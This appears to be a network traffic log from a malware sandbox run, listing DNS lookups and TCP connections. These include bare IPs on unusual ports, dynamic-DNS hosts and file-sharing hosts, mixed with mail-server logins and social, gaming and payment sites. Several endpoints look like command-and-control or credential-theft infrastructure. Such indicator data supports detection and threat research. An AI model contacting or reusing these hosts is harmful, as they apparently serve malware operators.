US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.23:443 download.opera.com tcp
US 13.248.169.48:80 www.shortfall.net tcp
US 13.107.42.13:443 onedrive.live.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 172.217.1.37.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 download3.operacdn.com udp
NL 2.19.194.43:443 download3.operacdn.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 194.49.94.152:50500 tcp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
US 8.8.8.8:53 43.194.19.2.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 174.247.240.157.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.71.94:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HK 8.217.92.5:80 www.gdyanjiu.icu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.pdian.link udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 www.buddyurns.com udp
RU 91.215.85.63:7020 listpoints.click tcp
FR 213.186.33.5:80 www.buddyurns.com tcp
US 8.8.8.8:53 5.33.186.213.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 www.pdian.link udp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 149.154.167.99:443 t.me tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
DE 195.201.255.35:443 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.antsnav.com udp
US 104.21.79.64:80 www.antsnav.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 8.8.8.8:53 www.xotikvpn.xyz udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 162.255.119.91:80 www.xotikvpn.xyz tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
GB 212.3.242.82:143 mail.be tcp
BG 185.141.63.4:1074 tcp
DE 195.201.255.35:443 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 82.242.3.212.in-addr.arpa udp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.instagram.com udp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 91.218.217.172.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 imap.kpnmail.nl udp
NL 195.121.65.133:993 imap.kpnmail.nl tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
DE 195.201.255.35:443 tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 133.65.121.195.in-addr.arpa udp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 m-api.nexon.com udp
JP 52.193.97.244:443 m-api.nexon.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 mi.claro.com.pe udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 66.225.237.161:443 mi.claro.com.pe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 13.248.169.48:80 www.shortfall.net tcp
US 8.8.8.8:53 161.237.225.66.in-addr.arpa udp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 66.225.237.161:443 mi.claro.com.pe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.hupkeo.link udp
DE 91.195.240.19:80 www.hupkeo.link tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 66.225.237.161:443 mi.claro.com.pe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 oauth.vk.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.129.181:443 oauth.vk.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.irmaosconstrusilva.store udp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 181.129.240.87.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 vk.com udp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 87.240.132.67:443 vk.com tcp
US 8.8.8.8:53 api.vk.com udp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.137.207:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 207.137.240.87.in-addr.arpa udp
RU 87.240.137.207:443 api.vk.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.137.207:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 195.121.65.133:993 imap.kpnmail.nl tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 mail.be udp
GB 212.3.242.82:143 mail.be tcp
BG 185.141.63.4:1074 tcp
RU 87.240.137.207:443 api.vk.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
RU 87.240.137.207:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
RU 87.240.129.181:443 oauth.vk.com tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.137.207:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.132.67:443 vk.com tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 87.240.137.207:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
RU 185.172.128.100:80 185.172.128.100 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 188.114.97.0:80 sl.himanfast.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.tike-taka.com udp
US 104.18.36.73:80 www.tike-taka.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
GB 212.3.242.82:993 mail.be tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 73.36.18.104.in-addr.arpa udp
US 13.107.42.13:443 onedrive.live.com tcp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 34.120.175.65:80 www.333vvs.com tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 in.pandora.be udp
BE 195.130.132.12:993 in.pandora.be tcp
BG 185.141.63.4:1074 tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 12.132.130.195.in-addr.arpa udp
US 8.8.8.8:53 www.instagram.com udp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.hreeremaeps.com udp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.67.143:443 pastebin.com tcp
US 188.114.97.0:443 yip.su tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 194.49.94.47:80 194.49.94.47 tcp
US 8.8.8.8:53 gobo25cl.top udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 redirector.pm udp
US 8.8.8.8:53 rawcracker.com udp
US 172.67.197.19:80 gobo25cl.top tcp
US 8.8.8.8:53 net.geo.opera.com udp
BG 91.92.243.139:80 91.92.243.139 tcp
US 8.8.8.8:53 check.graspalace.com udp
US 8.8.8.8:53 iplogger.com udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 194.49.94.85:443 redirector.pm tcp
US 188.114.97.0:443 check.graspalace.com tcp
US 188.114.97.0:80 check.graspalace.com tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 172.67.197.19:443 gobo25cl.top tcp
US 172.67.194.188:443 iplogger.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 bobkelsofan.com udp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 104.21.35.235:443 potatogoose.com tcp
US 104.21.27.119:443 bobkelsofan.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 194.49.94.152:50500 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 www.instagram.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 157.240.201.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 174.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 www.amazon.com udp
US 8.8.8.8:53 www.nnxh.net udp
HK 154.216.129.246:80 www.nnxh.net tcp
US 162.219.225.118:443 www.amazon.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 118.225.219.162.in-addr.arpa udp
US 8.8.8.8:53 i.instagram.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 apiv2.jofogas.hu udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 www.ssongg10834.cfd udp
BG 185.141.63.4:1074 tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
US 8.8.8.8:53 111.69.33.194.in-addr.arpa udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 www.gdjianyong.icu udp
HK 8.217.92.5:80 www.gdjianyong.icu tcp
US 8.8.8.8:53 s.youtube.com udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
NL 142.250.102.138:443 s.youtube.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.clawenterprises.net udp
US 76.223.105.230:80 www.clawenterprises.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 138.102.250.142.in-addr.arpa udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 230.105.223.76.in-addr.arpa udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
BG 185.141.63.4:1074 tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 imap.tele2.nl udp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
NL 82.215.18.89:993 imap.tele2.nl tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.122:443 download.opera.com tcp
US 8.8.8.8:53 www.pdian.link udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.antsnav.com udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 188.114.96.0:80 www.antsnav.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:80 api.steampowered.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 162.219.225.118:443 www.amazon.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.irmaosconstrusilva.store udp
US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 gservicese.com udp
BG 185.141.63.4:1074 tcp
RU 91.215.85.63:2718 gservicese.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.gdjianyong.icu udp
US 8.8.8.8:53 www.a0zu3im002.cfd udp
HK 8.217.92.5:80 www.gdjianyong.icu tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.telenet.be udp
CA 108.181.20.37:443 files.catbox.moe tcp
BE 195.130.132.15:993 imap.telenet.be tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.922proxy.com udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 104.26.9.87:443 api.922proxy.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 87.9.26.104.in-addr.arpa udp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 files.catbox.moe udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 www.bord90-1us.click udp
BG 185.141.63.4:1074 tcp
US 188.114.96.0:80 www.bord90-1us.click tcp
US 194.49.94.152:50500 tcp
DE 195.201.255.35:443 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 www.wiz.cn udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.spacecargo.net udp
DE 195.201.255.35:443 tcp
US 13.248.169.48:80 www.spacecargo.net tcp
CN 182.92.20.26:443 www.wiz.cn tcp
CN 182.92.20.26:443 www.wiz.cn tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.telfort.nl udp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 195.121.65.134:993 imap.telfort.nl tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 26.20.92.182.in-addr.arpa udp
DE 195.201.255.35:443 tcp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
DE 195.201.255.35:443 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.stericyclehq.com udp
IT 81.17.18.197:80 www.stericyclehq.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 as.wiz.cn udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
CN 120.55.138.92:443 as.wiz.cn tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 api.steampowered.com udp
US 8.8.8.8:53 outlook.office365.com udp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
NL 40.101.121.34:993 outlook.office365.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 92.138.55.120.in-addr.arpa udp
US 8.8.8.8:53 34.121.101.40.in-addr.arpa udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 www.rewards.sony.com udp
US 104.244.42.129:443 twitter.com tcp
BG 185.141.63.4:1074 tcp
US 104.16.122.32:443 www.rewards.sony.com tcp
BG 185.141.63.4:1074 tcp
DE 195.201.255.35:443 tcp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 32.122.16.104.in-addr.arpa udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.ljwixsb.top udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 oauth.vk.com udp
FR 157.240.196.63:443 i.instagram.com tcp
RU 87.240.129.181:443 oauth.vk.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BE 195.13.7.87:993 imap.proximus.be tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 87.7.13.195.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 195.201.255.35:443 tcp
RU 91.215.85.63:8118 gservicese.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
DE 195.201.255.35:443 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
